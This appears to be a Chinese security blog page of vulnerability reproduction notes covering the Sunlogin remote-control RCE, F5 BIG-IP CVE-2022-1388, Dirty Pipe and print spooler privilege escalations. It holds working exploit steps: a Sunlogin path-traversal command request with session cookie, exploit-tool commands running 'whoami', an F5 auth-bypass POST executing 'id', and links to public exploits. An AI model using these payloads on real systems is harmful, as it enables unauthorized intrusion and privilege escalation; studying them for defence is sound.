CVE复现

RCE

向日葵远程代码执行

描述

向日葵远程控制是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。

(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版。 该漏洞发生在接口``/check`处,

此漏洞端口一般大于40000

影响版本
1
2
3
4
5
11.1.1

10.3.0.27372

11.0.0.33162 (不一定准确)
复现

手工测试:

首先我们要确定目标端口(扫描开放端口,一般在 40000以上),然后访问

1
http://192.168.1.102:49414/

image-20220320225345974

获取token

1
http://192.168.1.102:49414/cgi-bin/rpc?action=verify-haras

image-20220320225428763

“verify_string” 的值会刷新改变,但这个下面我们和CID:组成cookie

1
2
3
/check?cmd=ping../../../../../../../../../../../windows/system32/ipconfig

添加 Cookie: CID=sobGzXzWBfSlSbdqnmkUbJMLEjhssRx1

image-20220320230404045

脚本测试:

1
https://github.com/Mr-xn/sunlogin_rce
1
xrkRce.exe -h 192.168.1.102 -t scan

image-20220320224603734

1
xrkRce.exe -h 192.168.1.102 -t rce -p 49414 -c "whoami"

image-20220320225054179

参考:

https://www.cnblogs.com/cn-gov/p/15952459.html

CVE-2022-0543 Redis Lua 沙箱绕过

参考:

https://mp.weixin.qq.com/s/Q3iRoVynpkUHUDo74UnXgA

CVE-2022-1388 F5 BIG-IP远程代码执行漏洞

该漏洞允许未经身份验证的攻击者通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,以执行任意系统命令、创建或删除文件以及禁用BIG-IP上的服务。

poc

1
2
3
4
5
6
7
8
POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c 'id' " } ( id换成rec)

0xf4n9x/CVE-2022-1388:CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE (github.com)

spring

CVE-2022-22965 Spring Framework RCE, Early Announcement

(28条消息) Spring Framework RCE(CVE-2022-22965)_6right的博客-CSDN博客

CVE-2022-22947 Spring Cloud Gateway

Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947) - 三亿人 - 博客园 (cnblogs.com)

Structs2

Structs2-026 RCE

新出的 ,CVE-2021-31805

1
Apache Struts 2.0.0-2.5.29

https://mp.weixin.qq.com/s/B17fFD3xDYvNib6LhUS9dA

ThinkPHP

ThinkPHP 6.0.12LTS 反序列漏洞分析
1
ThinkPHP 6.0.12LTS(目前最新版本);

https://mp.weixin.qq.com/s/xgolXMP8QkeQRH8ylm86dg

提权

CVE-2022-0847 Linux 本地内核提权漏洞

描述

堪称新版脏牛。Dirty Pipe

该漏洞源于新管道缓冲区结构的“flag”变量在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化。非特权本地用户利用该漏洞可以提升权限至root。

允许非特权用户注入和覆盖任意只读文件中的数据,非特权用户通过替换/etc/passwd文件中root用户的hash值达到权限提升的目的。

exp 链接:https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

适用范围:
1
2
3
Linux Kernel版本 >= 5.8

Linux Kernel版本 < 5.16.11 / 5.15.25 / 5.10.102
复现
1
2
3
4
5
cat /proc/version    #查看linux内核版本

./compile.sh

./exploit

image-20220310212912716

原理:漏洞通告:CVE-2022-0847linux内核提权漏洞复现/原理讲解 (qq.com)

https://www.freebuf.com/company-information/324470.html

CVE-2022-0847_DirtyPipe Linux 内核提权漏洞分析及复现 - 火线 Zone-云安全社区 (huoxian.cn)

打印机提权漏洞

CVE-2020-1337

CVE-2020–1030

CVE-2020–1048

CVE-2022-21999 打印机提权漏洞

环境原因没有复现成功

参考:

原理:https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81

poc:https://github.com/ly4k/SpoolFool

CVE-2022–26923Active Directory 域权限提升漏洞

  • 由于对用户属性的不正确获取,允许低权限用户在安装了 Active Directory 证书服务(AD CS)服务器角色的 Active Directory 环境中将权限提升至域管理员。
  • Copyrights © 2020-2023 Shmily-ing
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信